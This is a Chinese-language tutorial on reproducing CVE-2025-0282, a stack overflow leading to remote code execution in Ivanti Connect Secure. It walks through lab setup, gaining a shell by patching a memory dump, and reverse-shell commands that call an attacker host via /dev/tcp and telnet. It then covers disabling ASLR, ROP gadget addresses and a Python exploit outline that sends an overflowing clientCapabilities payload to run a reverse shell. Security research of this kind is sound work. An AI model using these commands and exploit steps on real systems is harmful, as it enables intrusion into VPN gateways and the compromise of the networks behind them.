Ivanti CVE-2025-0282漏洞分析与利用教学文档

本文档基于先知社区（阿里云）于2026年3月23日发布的《ivanti CVE-2025-0282漏洞复现》文章整理，旨在提供一份详尽的技术教学指南，涵盖漏洞背景、环境搭建、分析方法、利用技巧及完整漏洞复现流程。本漏洞是Ivanti Connect Secure中的一处栈溢出漏洞，最终可导致远程代码执行。

1. 环境搭建

目标软件：Ivanti Connect Secure (Pulse Connect Secure)
版本：ISA-V-VMWARE-ICS-22.7R2.3-3431.1
漏洞编号：CVE-2025-0282

1. 获取固件：
   从官方渠道或指定地址下载包含漏洞版本的虚拟机镜像文件。下载地址为：https://pulsezta.blob.core.windows.net/gateway/nsa/ISA-V-VMWARE-ICS-22.7R2.3-3431.1.zip。

2. 导入虚拟机：

   • 解压下载的ZIP文件，找到OVF文件。
   • 使用VMware Workstation或同类虚拟化软件导入该OVF文件。
   • 确定虚拟机存储位置，等待初始化完成。
   • 按照安装向导提示，设置管理员账号和密码。

3. 网络配置：

   • 虚拟机启动后，必须将虚拟机的网络适配器从“桥接模式”改为“NAT模式”。这是为了确保虚拟机能够获得一个可路由的IP地址，便于后续访问和调试。
   • 配置完成后，在宿主机浏览器中访问虚拟机的IP地址，应能看到Ivanti Connect Secure的Web登录界面，表示环境搭建成功。

2. 固件提取与Shell获取

由于虚拟机磁盘（VMDK）被加密，无法直接挂载获取文件系统。文中介绍了两种方法，本教学采用其中一种：Patch内存法。

2.1 通过内存Patch获取Shell

1. 暂停虚拟机获取内存文件：

   • 在VMware中暂停（Suspend）目标Ivanti虚拟机。
   • 在虚拟机文件目录下，会生成一个后缀为.vmem的文件，此即虚拟机的物理内存转储。

2. 修改内存文件：

   • 使用十六进制编辑器（如010 Editor）打开.vmem文件。
   • 执行全局搜索与替换操作。
   • 搜索字符串：/home/bin/dsconfig.pl
   • 替换为字符串：///////////////bin/sh
   • 关键原理：目标字符串/home/bin/dsconfig.pl用于在控制台界面调用脚本。将其替换为同等长度（21字节）的/bin/sh路径（前面用/填充），可以保证内存偏移不发生变化。当控制台界面因超时或其他原因执行该路径时，实际启动的是/bin/sh，从而获得底层Shell。

3. 获取Shell：

   • 保存修改后的.vmem文件。
   • 恢复（Resume）虚拟机运行。
   • 等待控制台界面出现，在其超时后按“回车”键，即可获得一个底层Shell。

2.2 建立稳定的远程工作环境

获取的Shell操作不便，需建立更稳定的远程控制通道。

1. 反弹Shell：

   • 在攻击机（如Ubuntu）上开启两个监听端口，例如8888和8889。8889用于输入命令，8888用于接收命令输出。

   # 终端1 - 接收输出
   nc -lvnp 8888
   # 终端2 - 发送命令
   nc -lvnp 8889
   

   • 在Ivanti的Shell中，使用以下命令之一反弹连接：

   # 方法1：使用管道和telnet
   telnet <攻击机IP> 8888 | /bin/bash | telnet <攻击机IP> 8889
   # 方法2：使用bash内置功能
   bash -i >& /dev/tcp/<攻击机IP>/8888 0>&1
   

   • 成功后，在攻击机的8889端口终端输入命令，在8888端口终端查看结果。

2. 开启HTTP文件服务：

   • 为了方便从Ivanti设备上下载文件，需要开启一个简易HTTP服务器。
   • 首先在Ivanti Shell中检查防火墙规则，并放行一个端口（例如8000）：

   iptables -L -n # 查看现有规则
   iptables -A INPUT -p tcp --dport 8000 -j ACCEPT # 添加规则允许8000端口入站
   

   • 在包含所需文件（如/home/bin/web）的目录下，启动Python HTTP服务：

   python -m SimpleHTTPServer 8000
   

   • 在攻击机浏览器中访问 http://<Ivanti_IP>:8000，即可浏览和下载文件。

3. 上传调试工具：

   • 需要将gdbserver上传到Ivanti设备以便远程调试。可从Github下载静态编译版本（如gdbserver-7.10.1-x86_32）。
   • 在攻击机和Ivanti设备上分别运行Python脚本进行文件传输：
   • 接收端脚本 (Ivanti设备执行 - recv.py)：监听端口，接收数据并写入文件。
   • 发送端脚本 (攻击机执行 - send.py)：连接到Ivanti的监听端口，发送文件内容。
   • 传输前需在Ivanti防火墙放行对应端口（如8888）。
   • 传输完成后，在Ivanti上为gdbserver添加可执行权限：chmod +x /tmp/gdbserver-static。

3. 漏洞原理分析

1. 目标程序：漏洞存在于Web服务组件/home/bin/web中，这是一个32位小端序的ELF程序。

2. 漏洞定位：根据公开信息，漏洞函数位于sub_e3540。进一步分析，其内部会调用sub_E4AD0函数，此处是漏洞触发点。

3. 漏洞成因：在sub_E4AD0函数中，存在以下关键代码逻辑：

   • 程序会处理一个名为clientCapabilities的参数。
   • 首先，获取clientCapabilities字符串的长度（clientCapabilities_len）。
   • 然后，检查字符串缓冲区（位于a1 + 140）的当前容量（*(_DWORD *)(a1 + 148)）。
   • 如果当前容量不足，会调用DSStr::reserve(...)函数重新分配内存。
   • 随后，通过strncpy进行字符串拷贝。拷贝的目标地址是dest，源地址是clientCapabilities字符串，拷贝长度为clientCapabilities_len + 1。
   • 漏洞点：dest位于栈上，而strncpy的拷贝操作没有正确校验目标缓冲区dest的大小，导致过长的clientCapabilities参数可以覆盖dest之后的栈数据，包括函数返回地址、保存的寄存器以及重要的结构体指针（如a1），从而引发栈溢出。

4. 控制流劫持点：溢出发生后，在函数返回前，会执行以下虚函数调用：

   call dword ptr [eax+48h]
   

   其中eax来源于[esp+0A0Ch+arg_0]（即a1）指针的解引用。由于栈溢出可以覆盖a1指针本身，使其指向一个可控的内存区域。攻击者可以伪造一个虚函数表（vtable），使得[eax+48h]指向一个精心构造的ROP gadget，从而劫持程序控制流。

4. 漏洞利用与复现

4.1 构造触发数据包

官方客户端openconnect可用来与Ivanti服务建立连接并发送数据。我们需要修改其源码以构造恶意的clientCapabilities参数。

1. 编译环境准备：在攻击机（如Ubuntu）上安装编译依赖。
2. 下载与修改openconnect：
   • git clone https://github.com/openconnect/openconnect.git
   • 修改openconnect源码中的pulse.c文件。找到构造请求的代码段，将clientCapabilities参数修改为包含大量填充字符（如”A”）的长字符串，以触发崩溃。例如：

   buf_append(reqbuf, " clientCapabilities=%s", bytes);
   for (unsigned int n = 0; n < 100; n++)
       buf_append(reqbuf, "AAAAAAAAAAAAAAAA");
   

3. 编译与测试：
   • 执行./autogen.sh，./configure ...，make进行编译。
   • 使用编译好的程序连接目标：./openconnect <target_ip> --protocol=pulse --dump-http-traffic -vvv
   • 观察输出，确认能发送超长参数并触发服务端异常（如崩溃）。

4.2 动态调试与分析

1. 附加调试器：

   • 在Ivanti设备上，用上传的gdbserver附加到正在运行的web进程（监听443端口的进程）。

   ./gdbserver-static 0.0.0.0:1234 --attach $(netstat -anptl | grep 443 | awk ‘{print $7}’ | cut -d’/’ -f1 | grep -v “-“)
   

   • 在攻击机上，使用gdb连接远程调试服务：target remote <Ivanti_IP>:1234

2. 定位溢出与劫持点：

   • 在strncpy或相关函数上下断点，发送测试payload，观察栈的覆盖情况。
   • 重点观察覆盖a1指针后，call dword ptr [eax+48h]指令执行时，eax的值以及[eax+48h]指向的地址。

4.3 构造ROP链

1. 寻找Gadget：

   • 目标是找到一个gadget，其地址存储在某个库文件的虚函数表偏移0x48处。这个gadget需要能调整栈指针（如add esp, 0x204C），以跳过被破坏的栈数据，为后续ROP链执行创造条件。
   • 文章中提到的关键gadget序列为：
     • mov ebx, 0xfffffff0
     • add esp, 0x204C
     • mov eax, ebx
     • pop ebx; pop esi; pop edi; pop ebp; ret
   • 使用objdump工具扫描从Ivanti设备提取的共享库文件（如/home/lib/下的.so文件），寻找包含add esp, 0x204c指令的gadget。文中在libdsplibs.so中找到了该gadget。

2. 计算关键地址：

   • 假设在libdsplibs.so中找到的gadget地址偏移为0x11D8940。
   • 由于调用是call [eax+48h]，所以需要让eax+0x48 = 0x11D8940，因此eax应为0x11D88F8。
   • 需要进一步在内存或二进制中找到一个地址，其存储的值是0x11D88F8（即指向虚表）。通过IDA的交叉引用功能，可以找到这样的地址，例如0x00934F4C。这个地址就是我们需要通过栈溢出覆盖a1指针，使其指向的地址。

3. 关闭ASLR（仅用于简化本地调试）：

   • 在攻击调试阶段，为了地址稳定，可以在Ivanti设备上临时关闭地址空间布局随机化（ASLR）：

   echo 0 > /proc/sys/kernel/randomize_va_space
   

   • 重启Web服务，此时库的加载基址将固定不变，便于计算gadget的绝对地址。

4.4 编写利用脚本（EXP）

由于修改的openconnect不适合发送复杂的ROP数据，需要编写独立的Python利用脚本。

脚本核心步骤：

1. 构造恶意缓冲区：

   • 计算libdsplibs.so的加载基址（关闭ASLR后固定）加上目标gadget的偏移，得到绝对地址。
   • 构建Payload结构：
     • 填充物（如”A”*N）覆盖到返回地址/a1指针位置。
     • 覆盖a1指针为指向0x00934F4C（存储0x11D88F8的地址）的地址。
     • 在a1指针之后的内存布局中，精心布置ROP链。ROP链的目标通常是调用system()函数执行命令。这需要：
       • 将命令字符串地址放入eax。
       • 调用system函数（需要先找到system函数地址）。
       • 可以使用pop eax; ret、mov dword ptr [edx], eax; ret、add eax, 8; ret等gadget来逐步设置参数并调用system。
   • 注意避免Payload中出现空字节(\x00)，防止字符串操作提前截断。

2. 建立连接与协议握手：

   • 使用socket和ssl库与目标<target_ip>:443建立TCP/SSL连接。
   • 发送一个HTTP Upgrade请求，将协议升级为IF-T/TLS 1.0。这是Pulse Connect Secure协议握手的必要步骤。
   • 验证服务器返回101 Switching Protocols响应。

3. 发送漏洞触发包：

   • 按照IF-T/TLS协议格式构造数据包。包头通常包括消息类型、序列号、长度等信息。
   • 在数据部分，将clientCapabilities参数设置为构造好的恶意Payload缓冲区。
   • 发送该数据包。

4. 执行命令：

   • 如果利用成功，ROP链将执行，通常会启动一个反向Shell或执行Payload中指定的命令（如/bin/sh -c “反弹Shell命令”）。
   • 攻击机需提前在指定端口上开启监听（例如使用nc -lvnp 9999）以接收反弹回来的Shell。

利用脚本示例概要：

import socket, ssl, struct

def exploit(target_ip, target_port, lhost, lport):
    # 1. 计算gadget地址 (需根据实际调试结果填写)
    libdsplibs_base = 0xf6525000  # 示例基址，需动态获取
    gadget_vtable_addr = libdsplibs_base + 0x11D88F8
    gadget_system_addr = ... # 找到system函数地址
    pop_eax_ret = libdsplibs_base + ...
    # ... 其他gadget

    # 2. 构造ROP链和完整Payload
    rop_chain = b""
    rop_chain += struct.pack(‘<I’, pop_eax_ret)
    rop_chain += struct.pack(‘<I’, cmd_addr)  # 命令字符串地址
    rop_chain += struct.pack(‘<I’, gadget_system_addr)
    # ...
    buffer = b“A” * offset_to_control  # 填充至溢出点
    buffer += struct.pack(‘<I’, 0x00934F4C)  # 覆盖a1指针，指向伪造vtable指针的地址
    buffer += rop_chain
    buffer += b“C” * (payload_len – len(buffer)) # 填充剩余长度
    buffer += cmd_str  # 命令字符串，如反弹shell指令

    # 3. 建立SSL连接
    # 4. 发送HTTP Upgrade请求
    # 5. 发送包含恶意clientCapabilities的IF-T/TLS数据包
    # 6. 检查监听端口是否收到连接

5. 总结与注意事项

• 漏洞本质：CVE-2025-0282是Ivanti Connect Secure在处理clientCapabilities参数时的栈溢出漏洞，结合特定对象指针覆盖，可实现远程代码执行。
• 利用关键：
  1. 精确控制栈溢出数据，覆盖a1指针。
  2. 在内存空间中找到合适的gadget链，特别是能调整栈指针并最终导向命令执行的序列。
  3. 理解Pulse协议的握手过程（HTTP Upgrade to IF-T/TLS），正确构造攻击数据包。
• 调试技巧：关闭目标系统的ASLR可以极大地简化漏洞利用的开发与调试过程，但需注意这仅适用于实验环境。
• 防御建议：及时更新Ivanti Connect Secure到官方修复版本。在网络边界实施严格的访问控制，并对相关端口的入站连接进行监控。

免责声明：本教学文档仅用于安全研究、学习与防御目的。任何个人或组织不得将此文档所述技术用于非法攻击或未授权测试。使用者需遵守《网络安全法》及相关法律法规，在获得明确授权的前提下进行安全测试。